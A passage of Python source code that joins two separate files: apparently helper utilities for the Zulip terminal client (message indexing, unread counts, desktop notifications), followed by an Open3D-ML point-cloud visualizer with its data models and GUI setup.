'unread_msg_ids': Set[int] # {message_ids, ...}
})
initial_index = Index(
pointer=defaultdict(set),
all_msg_ids=set(),
starred_msg_ids=set(),
private_msg_ids=set(),
private_msg_ids_by_user_ids=defaultdict(set),
stream_msg_ids_by_stream_id=defaultdict(set),
topic_msg_ids=defaultdict(dict),
edited_messages=set(),
topics=defaultdict(list),
search=set(),
messages=defaultdict(dict),
unread_msg_ids=set(),
)
UnreadCounts = TypedDict('UnreadCounts', {
'all_msg': int,
'all_pms': int,
'unread_topics': Dict[Tuple[int, str], int], # stream_id, topic
'unread_pms': Dict[int, int], # sender_id
'unread_huddles': Dict[FrozenSet[int], int], # Group pms
'streams': Dict[int, int], # stream_id
})
def asynch(func: Any) -> Any:
"""
Decorator for executing a function in a separate :class:`threading.Thread`.
"""
@wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
# If calling when pytest is running simply return the function
# to avoid running in asynch mode.
if os.environ.get("PYTEST_CURRENT_TEST"):
return func(*args, **kwargs)
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
return thread.start()
return wrapper
def set_count(id_list: List[int], controller: Any, new_count: int) -> None:
# This method applies new_count for 'new message' (1) or 'read' (-1)
# (we could ensure this in a different way by a different type)
assert new_count == 1 or new_count == -1
messages = controller.model.index['messages']
unread_counts = controller.model.unread_counts # type: UnreadCounts
for id in id_list:
msg = messages[id]
if msg['type'] == 'stream':
key = (messages[id]['stream_id'], msg['subject'])
unreads = unread_counts['unread_topics']
# self-pm has only one display_recipient
# 1-1 pms have 2 display_recipient
elif len(msg['display_recipient']) <= 2:
key = messages[id]['sender_id']
unreads = unread_counts['unread_pms'] # type: ignore
else: # If it's a group pm
key = frozenset( # type: ignore
recipient['id'] for recipient in msg['display_recipient']
)
unreads = unread_counts['unread_huddles'] # type: ignore
# broader unread counts (for all_* and streams) are updated
# later conditionally.
if key in unreads:
unreads[key] += new_count
if unreads[key] == 0:
unreads.pop(key)
elif new_count == 1:
unreads[key] = new_count
# if view is not yet loaded. Usually the case when first message is read.
while not hasattr(controller, 'view'):
time.sleep(0.1)
stream_buttons_log = controller.view.stream_w.log
is_open_topic_view = controller.view.left_panel.is_in_topic_view
if is_open_topic_view:
topic_buttons_log = controller.view.topic_w.log
toggled_stream_id = controller.view.topic_w.stream_button.stream_id
user_buttons_log = controller.view.user_w.log
all_msg = controller.view.home_button
all_pm = controller.view.pm_button
for id in id_list:
user_id = messages[id]['sender_id']
# If we sent this message, don't increase the count
if user_id == controller.model.user_id:
continue
msg_type = messages[id]['type']
add_to_counts = True
if msg_type == 'stream':
stream_id = messages[id]['stream_id']
msg_topic = messages[id]['subject']
if controller.model.is_muted_stream(stream_id):
add_to_counts = False # if muted, don't add to eg. all_msg
else:
for stream_button in stream_buttons_log:
if stream_button.stream_id == stream_id:
# FIXME: Update unread_count[streams]?
stream_button.update_count(stream_button.count +
new_count)
break
# FIXME: Update unread_counts['unread_topics']?
if ([messages[id]['display_recipient'], msg_topic] in
controller.model.muted_topics):
add_to_counts = False
if is_open_topic_view and stream_id == toggled_stream_id:
# If topic_view is open for incoming messages's stream,
# We update the respective TopicButton count accordingly.
for topic_button in topic_buttons_log:
if topic_button.topic_name == msg_topic:
topic_button.update_count(topic_button.count +
new_count)
else:
for user_button in user_buttons_log:
if user_button.user_id == user_id:
user_button.update_count(user_button.count + new_count)
break
unread_counts['all_pms'] += new_count
all_pm.update_count(unread_counts['all_pms'])
if add_to_counts:
unread_counts['all_msg'] += new_count
all_msg.update_count(unread_counts['all_msg'])
while not hasattr(controller, 'loop'):
time.sleep(0.1)
controller.update_screen()
def index_messages(messages: List[Message],
model: Any,
index: Index) -> Index:
"""
STRUCTURE OF INDEX
{
'pointer': {
'[]': 30 # str(ZulipModel.narrow)
'[["stream", "verona"]]': 32,
...
}
'topic_msg_ids': {
123: { # stream_id
'topic name': {
51234, # message id
56454,
...
}
},
'private_msg_ids_by_user_ids': {
(3, 7): { # user_ids frozenset
51234,
56454,
...
},
(1, 2, 3, 4): { # multiple recipients
12345,
32553,
}
},
'topics': {
123: [ # stread_id
'Denmark2', # topic name
'Verona2',
....
]
},
'all_msg_ids': {
14231,
23423,
...
},
'private_msg_ids': {
22334,
23423,
...
},
'stream_msg_ids_by_stream_id': {
123: {
53434,
36435,
...
}
234: {
23423,
23423,
...
}
},
'edited_messages':{
51234,
23423,
...
},
'search': {
13242,
23423,
23423,
...
},
'messages': {
# all the messages mapped to their id
# for easy retrieval of message from id
45645: { # PRIVATE
'id': 4290,
'timestamp': 1521817473,
'content': 'Hi @**Cordelia Lear**',
'sender_full_name': 'Iago',
'flags': [],
'sender_short_name': 'iago',
'sender_email': 'iago@zulip.com',
'subject': '',
'subject_links': [],
'sender_id': 73,
'type': 'private',
'recipient_id': 124,
'reactions': [],
'display_recipient': [
{
'email': 'ZOE@zulip.com',
'id': 70,
'full_name': 'Zoe',
}, {
'email': 'cordelia@zulip.com',
'id': 71,
'full_name': 'Cordelia Lear',
}, {
'email': 'hamlet@zulip.com',
'id': 72,
'full_name': 'King Hamlet',
}, {
'email': 'iago@zulip.com',
'id': 73,
'full_name': 'Iago',
}
]
},
45645: { # STREAM
'timestamp': 1521863062,
'sender_id': 72,
'sender_full_name': 'King Hamlet',
'recipient_id': 119,
'content': 'https://github.com/zulip/zulip-terminal',
'type': 'stream',
'sender_email': 'hamlet@zulip.com',
'id': 4298,
'display_recipient': 'Verona',
'flags': [],
'reactions': [],
'subject': 'Verona2',
'stream_id': 32,
},
},
}
"""
narrow = model.narrow
for msg in messages:
if 'edit_history' in msg.keys():
index['edited_messages'].add(msg['id'])
index['messages'][msg['id']] = msg
if not narrow:
index['all_msg_ids'].add(msg['id'])
elif model.is_search_narrow():
index['search'].add(msg['id'])
continue
if len(narrow) == 1:
if narrow[0][1] == 'starred':
if 'starred' in msg['flags']:
index['starred_msg_ids'].add(msg['id'])
if msg['type'] == 'private':
index['private_msg_ids'].add(msg['id'])
recipients = frozenset(set(
recipient['id'] for recipient in msg['display_recipient']
))
if narrow[0][0] == 'pm_with':
narrow_emails = ([model.user_dict[email]['user_id']
for email in narrow[0][1].split(', ')] +
[model.user_id])
if recipients == frozenset(narrow_emails):
(index['private_msg_ids_by_user_ids'][recipients]
.add(msg['id']))
if msg['type'] == 'stream' and msg['stream_id'] == model.stream_id:
(index['stream_msg_ids_by_stream_id'][msg['stream_id']]
.add(msg['id']))
if msg['type'] == 'stream' and len(narrow) == 2 and\
narrow[1][1] == msg['subject']:
topics_in_stream = index['topic_msg_ids'][msg['stream_id']]
if not topics_in_stream.get(msg['subject']):
topics_in_stream[msg['subject']] = set()
topics_in_stream[msg['subject']].add(msg['id'])
return index
def classify_unread_counts(model: Any) -> Tuple[UnreadCounts, Set[int]]:
# TODO: support group pms
unread_msg_counts = model.initial_data['unread_msgs']
unread_msg_ids = set() # type: Set[int]
unread_counts = UnreadCounts(
all_msg=0,
all_pms=0,
unread_topics=dict(),
unread_pms=dict(),
unread_huddles=dict(),
streams=dict(),
)
for pm in unread_msg_counts['pms']:
message_ids = pm['unread_message_ids']
unread_msg_ids.update(message_ids)
count = len(message_ids)
unread_counts['unread_pms'][pm['sender_id']] = count
unread_counts['all_msg'] += count
unread_counts['all_pms'] += count
for stream in unread_msg_counts['streams']:
message_ids = stream['unread_message_ids']
unread_msg_ids.update(message_ids)
count = len(message_ids)
stream_id = stream['stream_id']
if [model.stream_dict[stream_id]['name'],
stream['topic']] in model.muted_topics:
continue
stream_topic = (stream_id, stream['topic'])
unread_counts['unread_topics'][stream_topic] = count
if not unread_counts['streams'].get(stream_id):
unread_counts['streams'][stream_id] = count
else:
unread_counts['streams'][stream_id] += count
unread_counts['all_msg'] += count
# store unread count of group pms in `unread_huddles`
for group_pm in unread_msg_counts['huddles']:
message_ids = group_pm['unread_message_ids']
unread_msg_ids.update(message_ids)
count = len(message_ids)
user_ids = group_pm['user_ids_string'].split(',')
user_ids = frozenset(map(int, user_ids))
unread_counts['unread_huddles'][user_ids] = count
unread_counts['all_msg'] += count
unread_counts['all_pms'] += count
return unread_counts, unread_msg_ids
def match_user(user: Any, text: str) -> bool:
"""
Matches if the user full name, last name or email matches
with `text` or not.
"""
full_name = user['full_name'].lower()
keywords = full_name.split()
# adding full_name helps in further narrowing down the right user.
keywords.append(full_name)
keywords.append(user['email'].lower())
for keyword in keywords:
if keyword.startswith(text.lower()):
return True
return False
def match_stream(stream: Any, text: str) -> bool:
"""
True if the stream matches with `text` (case insensitive),
False otherwise.
"""
stream_name = stream[0].lower()
if stream_name.startswith(text.lower()):
return True
return False
def match_groups(group_name: str, text: str) -> bool:
"""
True if any group name matches with `text` (case insensitive),
False otherwise.
"""
return group_name.lower().startswith(text.lower())
def powerset(iterable: Iterable[Any],
map_func: Callable[[Any], Any]=set) -> List[Any]:
"""
>> powerset([1,2,3])
returns: [set(), {1}, {2}, {3}, {1, 2}, {1, 3}, {2, 3}, {1, 2, 3}]"
"""
s = list(iterable)
powerset = chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
return list(map(map_func, list(powerset)))
def canonicalize_color(color: str) -> str:
"""
Given a color of the format '#xxxxxx' or '#xxx', produces one of the
format '#xxx'. Always produces lowercase hex digits.
"""
if match('^#[0-9A-Fa-f]{6}$', color, ASCII) is not None:
# '#xxxxxx' color, stored by current zulip server
return (color[:2] + color[3] + color[5]).lower()
elif match('^#[0-9A-Fa-f]{3}$', color, ASCII) is not None:
# '#xxx' color, which may be stored by the zulip server <= 2.0.0
# Potentially later versions too
return color.lower()
else:
raise ValueError('Unknown format for color "{}"'.format(color))
@asynch
def notify(title: str, html_text: str) -> None:
document = lxml.html.document_fromstring(html_text)
text = document.text_content()
command = ""
if WSL:
command = ('powershell.exe "New-BurntToastNotification'
' -Text \'{}\', \'{}\'"'.format(title, text))
elif MACOS:
command = ("osascript -e 'display notification \"{}\" with title"
" \"{}\"'".format(text, title))
elif LINUX:
command = 'notify-send "{}" "{}"'.format(title, text)
if command:
res = subprocess.run(shlex.split(command), stdout=subprocess.DEVNULL,
stderr=subprocess.STDOUT)
|
visualizer.py | import math
import numpy as np
import threading
import open3d as o3d
from open3d.visualization import gui
from open3d.visualization import rendering
from collections import deque
from .boundingbox import *
from .colormap import *
from .labellut import *
import time
class Model:
"""The class that helps build visualization models based on attributes, data, and methods."""
bounding_box_prefix = "Bounding Boxes/"
class BoundingBoxData:
"""The class to define a bounding box that is used to describe the target location.
Args:
name: The name of the pointcloud array.
boxes: The array of pointcloud that define the bounding box.
"""
def __init__(self, name, boxes):
self.name = name
self.boxes = boxes
def __init__(self):
# Note: the tpointcloud cannot store the actual data arrays, because
# the tpointcloud requires specific names for some arrays (e.g. "points",
# "colors"). So the tpointcloud exists for rendering and initially only
# contains the "points" array.
self.tclouds = {} # name -> tpointcloud
self.data_names = [] # the order data will be displayed / animated
self.bounding_box_data = [] # [BoundingBoxData]
self._data = {} # name -> {attr_name -> numpyarray}
self._known_attrs = {} # name -> set(attrs)
self._attr2minmax = {} # only access in _get_attr_minmax()
self._attr_rename = {"label": "labels", "feat": "feature"}
def _init_data(self, name):
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
self.data_names.append(name)
def is_loaded(self, name):
"""Check if the data is loaded."""
if name in self._data:
return len(self._data[name]) > 0
else:
# if the name isn't in the data, presumably it is loaded
# (for instance, if this is a bounding box).
return True
def load(self, name, fail_if_no_space=False):
"""If data is not loaded, then load the data."""
assert (False) # pure virtual
def unload(self, name):
assert (False) # pure virtual
def create_point_cloud(self, data):
"""Create a point cloud based on the data provided. The data should include name and points."""
assert ("name" in data) # name is a required field
assert ("points" in data) # 'points' is a required field
name = data["name"]
pts = self._convert_to_numpy(data["points"])
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
known_attrs = set()
if pts.shape[1] >= 4:
# We can't use inplace Tensor creation (e.g. from_numpy())
# because the resulting arrays won't be contiguous. However,
# TensorList can be inplace.
xyz = pts[:, [0, 1, 2]]
tcloud.point["points"] = Visualizer._make_tcloud_array(xyz,
copy=True)
else:
tcloud.point["points"] = Visualizer._make_tcloud_array(pts)
self.tclouds[name] = tcloud
# Add scalar attributes and vector3 attributes
attrs = {}
for k, v in data.items():
attr = self._convert_to_numpy(v)
if attr is None:
continue
attr_name = k
if attr_name == "point":
continue
new_name = self._attr_rename.get(attr_name)
if new_name is not None:
attr_name = new_name
if len(attr.shape) == 1 or len(attr.shape) == 2:
attrs[attr_name] = attr
known_attrs.add(attr_name)
self._data[name] = attrs
self._known_attrs[name] = known_attrs
def _convert_to_numpy(self, ary):
if isinstance(ary, list):
try:
return np.array(ary, dtype='float32')
except TypeError:
return None
elif isinstance(ary, np.ndarray):
if len(ary.shape) == 2 and ary.shape[0] == 1:
ary = ary[0] # "1D" array as 2D: [[1, 2, 3,...]]
if ary.dtype.name.startswith('int'):
return np.array(ary, dtype='float32')
else:
return ary
try:
import tensorflow as tf
if isinstance(ary, tf.Tensor):
return self._convert_to_numpy(ary.numpy())
except:
pass
try:
import torch
if isinstance(ary, torch.Tensor):
return self._convert_to_numpy(ary.detach().cpu().numpy())
except:
pass
return None
def get_attr(self, name, attr_name):
"""Get an attribute from data based on the name passed."""
if name in self._data:
attrs = self._data[name]
if attr_name in attrs:
return attrs[attr_name]
return None
def get_attr_shape(self, name, attr_name):
"""Get a shape from data based on the name passed."""
attr = self.get_attr(name, attr_name)
if attr is not None:
return attr.shape
return []
def get_attr_minmax(self, attr_name, channel):
"""Get the minimum and maximum for an attribute."""
attr_key_base = attr_name + ":" + str(channel)
attr_min = 1e30
attr_max = -1e30
for name in self._data.keys():
key = name + ":" + attr_key_base
if key not in self._attr2minmax:
attr = self.get_attr(name, attr_name)
if attr is None: # clouds may not have all the same attributes
continue
if len(attr.shape) > 1:
attr = attr[:, channel]
self._attr2minmax[key] = (attr.min(), attr.max())
amin, amax = self._attr2minmax[key]
attr_min = min(attr_min, amin)
attr_max = max(attr_max, amax)
if attr_min > attr_max:
return (0.0, 0.0)
return (attr_min, attr_max)
def get_available_attrs(self, names):
"""Get a list of attributes based on the name."""
attr_names = None
for n in names:
known = self._known_attrs.get(n)
if known is not None:
if attr_names is None:
attr_names = known
else:
attr_names = attr_names.intersection(known)
if attr_names is None:
return []
return sorted(attr_names)
def calc_bounds_for(self, name):
"""Calculate the bounds for a pointcloud."""
if name in self.tclouds and not self.tclouds[name].is_empty():
tcloud = self.tclouds[name]
# Ideally would simply return tcloud.compute_aabb() here, but it can
# be very slow on macOS with clang 11.0
pts = tcloud.point["points"].numpy()
min_val = (pts[:, 0].min(), pts[:, 1].min(), pts[:, 2].min())
max_val = (pts[:, 0].max(), pts[:, 1].max(), pts[:, 2].max())
return [min_val, max_val]
else:
return [(0.0, 0.0, 0.0), (0.0, 0.0, 0.0)]
class DataModel(Model):
"""The class for data i/o and storage of visualization.
Args:
userdata: The dataset to be used in the visualization.
"""
def __init__(self, userdata):
super().__init__()
# We could just create the TPointCloud here, but that would cause the UI
# to block. If we do it on load then the loading dialog will display.
self._name2srcdata = {}
for d in userdata:
name = d["name"]
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2srcdata[name] = d
def load(self, name, fail_if_no_space=False):
"""Load a pointcloud based on the name provided."""
if self.is_loaded(name):
return
self.create_point_cloud(self._name2srcdata[name])
def unload(self, name):
"""Unload a pointcloud."""
pass
class DatasetModel(Model):
"""The class used to manage a dataset model.
Args:
dataset: The 3D ML dataset to use. You can use the base dataset, sample datasets , or a custom dataset.
split: A string identifying the dataset split that is usually one of 'training', 'test', 'validation', or 'all'.
indices: The indices to be used for the datamodel. This may vary based on the split used.
"""
def __init__(self, dataset, split, indices):
super().__init__()
self._dataset = None
self._name2datasetidx = {}
self._memory_limit = 8192 * 1024 * 1024 # memory limit in bytes
self._current_memory_usage = 0
self._cached_data = deque()
self._dataset = dataset.get_split(split)
if len(self._dataset) > 0:
if indices is None:
indices = range(0, len(self._dataset))
# Some results from get_split() (like "training") are randomized.
# Sort, so that the same index always returns the same piece of data.
path2idx = {}
for i in range(0, len(self._dataset.path_list)):
path2idx[self._dataset.path_list[i]] = i
real_indices = [path2idx[p] for p in sorted(path2idx.keys())]
indices = [real_indices[idx] for idx in indices]
# SemanticKITTI names its items <sequence#>_<timeslice#>,
# "mm_nnnnnn". We'd like to use the hierarchical feature of the tree
# to separate the sequences. We cannot change the name in the dataset
# because this format is used to report algorithm results, so do it
# here.
underscore_to_slash = False
if dataset.__class__.__name__ == "SemanticKITTI":
underscore_to_slash = True
for i in indices:
info = self._dataset.get_attr(i)
name = info["name"]
if underscore_to_slash:
name = name.replace("_", "/")
while name in self._data: # ensure each name is unique
name = name + "_"
self._init_data(name)
self._name2datasetidx[name] = i
if dataset.__class__.__name__ in [
"Toronto3D", "Semantic3D", "S3DIS"
]:
self._attr_rename["feat"] = "colors"
self._attr_rename["feature"] = "colors"
else:
print("[ERROR] Dataset split has no data")
def is_loaded(self, name):
"""Check if the data is loaded."""
loaded = super().is_loaded(name)
if loaded and name in self._cached_data:
# make this point cloud the most recently used
self._cached_data.remove(name)
self._cached_data.append(name)
return loaded
def load(self, name, fail_if_no_space=False):
"""Check if data is not loaded, and then load the data."""
assert (name in self._name2datasetidx)
if self.is_loaded(name):
return True
idx = self._name2datasetidx[name]
data = self._dataset.get_data(idx)
data["name"] = name
data["points"] = data["point"]
if 'bounding_boxes' in data:
self.bounding_box_data.append(
Model.BoundingBoxData(name, data['bounding_boxes']))
self.create_point_cloud(data)
size = self._calc_pointcloud_size(self._data[name], self.tclouds[name])
if size + self._current_memory_usage > self._memory_limit:
if fail_if_no_space:
self.unload(name)
return False
else:
# Remove oldest from cache
remove_name = self._cached_data.popleft()
remove_size = self._calc_pointcloud_size(
self._data[remove_name], self.tclouds[remove_name])
self._current_memory_usage -= remove_size
self.unload(remove_name)
# Add new point cloud to cache
self._cached_data.append(name)
self._current_memory_usage += size
return True
else:
self._current_memory_usage += size
self._cached_data.append(name)
return True
def _calc_pointcloud_size(self, raw_data, pcloud):
"""Calcute the size of the pointcloud based on the rawdata."""
pcloud_size = 0
for (attr, arr) in raw_data.items():
pcloud_size += arr.size * 4
# Point cloud consumes 64 bytes of per point of GPU memory
pcloud_size += pcloud.point["points"].num_elements() * 64
return pcloud_size
def unload(self, name):
"""Unload the data (if it was loaded earlier)."""
# Only unload if this was loadable; we might have an in-memory,
# user-specified data created directly through create_point_cloud().
if name in self._name2datasetidx:
tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
self.tclouds[name] = tcloud
self._data[name] = {}
bbox_name = Model.bounding_box_prefix + name
for i in range(0, len(self.bounding_box_data)):
if self.bounding_box_data[i].name == bbox_name:
self.bounding_box_data.pop(i)
break
class Visualizer:
"""The visualizer class for dataset objects and custom point clouds."""
class LabelLUTEdit:
"""This class includes functionality for managing a labellut (label look-up-table)."""
def __init__(self):
self.widget = gui.TreeView()
self._on_changed = None # takes no args, returns no value
self.clear()
def clear(self):
"""Clears the look-up table."""
self.widget.clear()
self._label2color = {}
def is_empty(self):
"""Checks if the look-up table is empty."""
return len(self._label2color) == 0
def get_colors(self):
"""Returns a list of label keys."""
return [
self._label2color[label]
for label in sorted(self._label2color.keys())
]
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
def set_labels(self, labellut):
"""Updates the labels based on look-up table passsed."""
self.widget.clear()
root = self.widget.get_root_item()
for key in sorted(labellut.labels.keys()):
lbl = labellut.labels[key]
color = lbl.color
if len(color) == 3:
color += [1.0]
self._label2color[key] = color
color = gui.Color(lbl.color[0], lbl.color[1], lbl.color[2])
cell = gui.LUTTreeCell(
str(key) + ": " + lbl.name, True, color, None, None)
cell.checkbox.set_on_checked(
self._make_on_checked(key, self._on_label_checked))
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(key,
self._on_label_color_changed))
self.widget.add_item(root, cell)
def _make_on_color_changed(self, label, member_func):
def on_changed(color):
member_func(label, color)
return on_changed
def _on_label_color_changed(self, label, gui_color):
self._label2color[label] = [
gui_color.red, gui_color.green, gui_color.blue,
self._label2color[label][3]
]
if self._on_changed is not None:
self._on_changed()
def _make_on_checked(self, label, member_func):
def on_checked(checked):
member_func(label, checked)
return on_checked
def _on_label_checked(self, label, checked):
if checked:
alpha = 1.0
else:
alpha = 0.0
color = self._label2color[label]
self._label2color[label] = [color[0], color[1], color[2], alpha]
if self._on_changed is not None:
self._on_changed()
class ColormapEdit:
"""This class is used to create a color map for visualization of points."""
def __init__(self, window, em):
self.colormap = None
self.widget = gui.Vert()
self._window = window
self._min_value = 0.0
self._max_value = 1.0
self._on_changed = None # takes no args, no return value
self._itemid2idx = {}
self._min_label = gui.Label("")
self._max_label = gui.Label("")
grid = gui.VGrid(2)
grid.add_child(gui.Label("Range (min):"))
grid.add_child(self._min_label)
grid.add_child(gui.Label("Range (max):"))
grid.add_child(self._max_label)
self.widget.add_child(grid)
self.widget.add_fixed(0.5 * em)
self.widget.add_child(gui.Label("Colormap"))
self._edit = gui.TreeView()
self._edit.set_on_selection_changed(self._on_selection_changed)
self.widget.add_child(self._edit)
self._delete = gui.Button("Delete")
self._delete.horizontal_padding_em = 0.5
self._delete.vertical_padding_em = 0
self._delete.set_on_clicked(self._on_delete)
self._add = gui.Button("Add")
self._add.horizontal_padding_em = 0.5
self._add.vertical_padding_em = 0
self._add.set_on_clicked(self._on_add)
h = gui.Horiz()
h.add_stretch()
h.add_child(self._delete)
h.add_fixed(0.25 * em)
h.add_child(self._add)
h.add_stretch()
self.widget.add_fixed(0.5 * em)
self.widget.add_child(h)
self.widget.add_fixed(0.5 * em)
def set_on_changed(self, callback): # takes no args, no return value
self._on_changed = callback
def update(self, colormap, min_val, max_val):
"""Updates the colormap based on the minimum and maximum values passed."""
self.colormap = colormap
self._min_value = min_val
self._max_value = max_val
self._min_label.text = str(min_val)
self._max_label.text = str(max_val)
if self._min_value >= self._max_value:
self._max_value = self._min_value + 1.0
self._edit.clear()
self._itemid2idx = {}
root_id = self._edit.get_root_item()
for i in range(0, len(self.colormap.points)):
p = self.colormap.points[i]
color = gui.Color(p.color[0], p.color[1], p.color[2])
val = min_val + p.value * (max_val - min_val)
cell = gui.ColormapTreeCell(val, color, None, None)
cell.color_edit.set_on_value_changed(
self._make_on_color_changed(i, self._on_color_changed))
cell.number_edit.set_on_value_changed(
self._make_on_value_changed(i, self._on_value_changed))
item_id = self._edit.add_item(root_id, cell)
self._itemid2idx[item_id] = i
self._update_buttons_enabled()
def _make_on_color_changed(self, idx, member_func):
def on_changed(color):
member_func(idx, color)
return on_changed
def _on_color_changed(self, idx, gui_color):
self.colormap.points[idx].color = [
gui_color.red, gui_color.green, gui_color.blue
]
if self._on_changed is not None:
self._on_changed()
def _make_on_value_changed(self, idx, member_func):
def on_changed(value):
member_func(idx, value)
return on_changed
def _on_value_changed(self, idx, value):
value = (value - self._min_value) / (self._max_value -
self._min_value)
needs_update = False
value = min(1.0, max(0.0, value))
if ((idx > 0 and value < self.colormap.points[idx - 1].value) or
(idx < len(self.colormap.points) - 1 and
value > self.colormap.points[idx + 1].value)):
self.colormap.points[idx].value = value
o = self.colormap.points[idx]
self.colormap.points.sort(key=lambda cmap_pt: cmap_pt.value)
for i in range(0, len(self.colormap.points)):
if self.colormap.points[i] is o:
idx = i
break
needs_update = True
if idx > 0 and value == self.colormap.points[idx - 1].value:
if idx < len(self.colormap.points):
upper = self.colormap.points[idx + 1].value
else:
upper = 1.0
value = value + 0.5 * (upper - value)
needs_update = True
if idx < len(self.colormap.points
) - 1 and value == self.colormap.points[idx + 1].value:
if idx > 0:
lower = self.colormap.points[idx - 1].value
else:
lower = 0.0
value = lower + 0.5 * (value - lower)
needs_update = True
self.colormap.points[idx].value = value
if needs_update:
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_selection_changed(self, item_id):
self._update_buttons_enabled()
def _on_delete(self):
if len(self.colormap.points) > 2:
idx = self._itemid2idx[self._edit.selected_item]
self.colormap.points = self.colormap.points[:
idx] + self.colormap.points[
idx + 1:]
del self._itemid2idx[self._edit.selected_item]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _on_add(self):
if self._edit.selected_item in self._itemid2idx: # maybe no selection
idx = self._itemid2idx[self._edit.selected_item]
if idx < len(self.colormap.points) - 1:
lower = self.colormap.points[idx]
upper = self.colormap.points[idx + 1]
else:
lower = self.colormap.points[len(self.colormap.points) - 2]
upper = self.colormap.points[len(self.colormap.points) - 1]
add_idx = min(idx + 1, len(self.colormap.points) - 1)
new_value = lower.value + 0.5 * (upper.value - lower.value)
new_color = [
0.5 * lower.color[0] + 0.5 * upper.color[0],
0.5 * lower.color[1] + 0.5 * upper.color[1],
0.5 * lower.color[2] + 0.5 * upper.color[2]
]
new_point = Colormap.Point(new_value, new_color)
self.colormap.points = self.colormap.points[:add_idx] + [
new_point
] + self.colormap.points[add_idx:]
self._update_later()
if self._on_changed is not None:
self._on_changed()
def _update_buttons_enabled(self):
if self._edit.selected_item in self._itemid2idx:
self._delete.enabled = len(self.colormap.points) > 2
self._add.enabled = True
else:
self._delete.enabled = False
self._add.enabled = False
def _update_later(self):
def update():
self.update(self.colormap, self._min_value, self._max_value)
self._window.post_redraw() # need to manually request redraw
gui.Application.instance.post_to_main_thread(self._window, update)
class ProgressDialog:
"""
This class is used to manage the progress dialog displayed during visualization.
Args:
title: The title of the dialog box.
window: The window where the progress dialog box should be displayed.
n_items: The maximum number of items.
"""
def __init__(self, title, window, n_items):
self._window = window
self._n_items = n_items
em = window.theme.font_size
self.dialog = gui.Dialog(title)
self._label = gui.Label(title + " ")
self._layout = gui.Vert(0, gui.Margins(em, em, em, em))
self.dialog.add_child(self._layout)
self._layout.add_child(self._label)
self._layout.add_fixed(0.5 * em)
self._progress = gui.ProgressBar()
self._progress.value = 0.0
self._layout.add_child(self._progress)
def set_text(self, text):
"""Set the label text on the dialog box."""
self._label.text = text + " "
def post_update(self, text=None):
"""Post updates to the main thread."""
if text is None:
gui.Application.instance.post_to_main_thread(
self._window, self.update)
else:
def update_with_text():
self.update()
self._label.text = text
gui.Application.instance.post_to_main_thread(
self._window, update_with_text)
def update(self):
"""Enumerate the progress in the dialog box."""
value = min(1.0, self._progress.value + 1.0 / self._n_items)
self._progress.value = value
SOLID_NAME = "Solid Color"
LABELS_NAME = "Label Colormap"
RAINBOW_NAME = "Colormap (Rainbow)"
GREYSCALE_NAME = "Colormap (Greyscale)"
COLOR_NAME = "RGB"
X_ATTR_NAME = "x position"
Y_ATTR_NAME = "y position"
Z_ATTR_NAME = "z position"
def __init__(self):
self._objects = None
self._name2treenode = {}
self._name2treeid = {}
self._treeid2name = {}
self._attrname2lut = {}
self._colormaps = {}
self._shadername2panelidx = {}
self._gradient = rendering.Gradient()
self._scalar_min = 0.0
self._scalar_max = 1.0
self._animation_frames = []
self._last_animation_time = time.time()
self._animation_delay_secs = 0.100
self._consolidate_bounding_boxes = False
self._dont_update_geometry = False
def _init_dataset(self, dataset, split, indices):
self._objects = DatasetModel(dataset, split, indices)
def _init_data(self, data):
self._objects = DataModel(data)
def _init_user_interface(self, title, width, height):
self.window = gui.Application.instance.create_window(
title, width, height)
self.window.set_on_layout(self._on_layout)
em = self.window.theme.font_size
self._3d = gui.SceneWidget()
self._3d.enable_scene_caching(True) # makes UI _much_ more responsive
self._3d.scene = rendering.Open3DScene(self.window.renderer)
self.window.add_child(self._3d)
self._panel = gui.Vert()
self.window.add_child(self._panel)
indented_margins = gui.Margins(em, 0, em, 0)
# View controls
ctrl = gui.CollapsableVert("Mouse Controls", 0, indented_margins)
arcball = gui.Button("Arcball")
arcball.set_on_clicked(self._on_arcball_mode)
arcball.horizontal_padding_em = 0.5
arcball.vertical_padding_em = 0
fly = gui.Button("Fly")
fly.set_on_clicked(self._on_fly_mode)
fly.horizontal_padding_em = 0.5
fly.vertical_padding_em = 0
reset = gui.Button("Re-center")
reset.set_on_clicked(self._on_reset_camera)
reset.horizontal_padding_em = 0.5
reset.vertical_padding_em = 0
h = gui.Horiz(0.25 * em)
h.add_stretch()
h.add_child(arcball)
h.add_child(fly)
h.add_fixed(em)
h.add_child(reset)
h.add_stretch()
ctrl.add_child(h)
ctrl.add_fixed(em)
self._panel.add_child(ctrl)
# Dataset
model = gui.CollapsableVert("Dataset", 0, indented_margins)
vgrid = gui.VGrid(2, 0.25 * em)
model.add_child(vgrid)
model.add_fixed(0.5 * em)
bgcolor = gui.ColorEdit()
bgcolor.color_value = gui.Color(1, 1, 1)
self._on_bgcolor_changed(bgcolor.color_value)
bgcolor.set_on_value_changed(self._on_bgcolor_changed)
vgrid.add_child(gui.Label("BG Color"))
vgrid.add_child(bgcolor)
view_tab = gui.TabControl()
view_tab.set_on_selected_tab_changed(self._on_display_tab_changed)
model.add_child(view_tab)
# ... model list
self._dataset = gui.TreeView()
self._dataset.set_on_selection_changed(
self._on_dataset_selection_changed)
view_tab.add_tab("List", self._dataset)
# ... animation slider
v = gui.Vert()
view_tab.add_tab("Animation", v)
v.add_fixed(0.25 * em)
grid = gui.VGrid(2)
v.add_child(grid)
self._slider = gui.Slider(gui.Slider.INT)
self._slider.set_limits(0, len(self._objects.data_names))
self._slider.set_on_value_changed(self._on_animation_slider_changed)
grid.add_child(gui.Label("Index"))
grid.add_child(self._slider)
self._slider_current = gui.Label("")
grid.add_child(gui.Label("Showing"))
grid.add_child(self._slider_current)
v.add_fixed(em)
self._play = gui.Button("Play")
self._play.horizontal_padding_em = 0.5
self._play.vertical_padding_em = 0
self._play.set_on_clicked(self._on_start_animation)
h = gui.Horiz()
h.add_stretch()
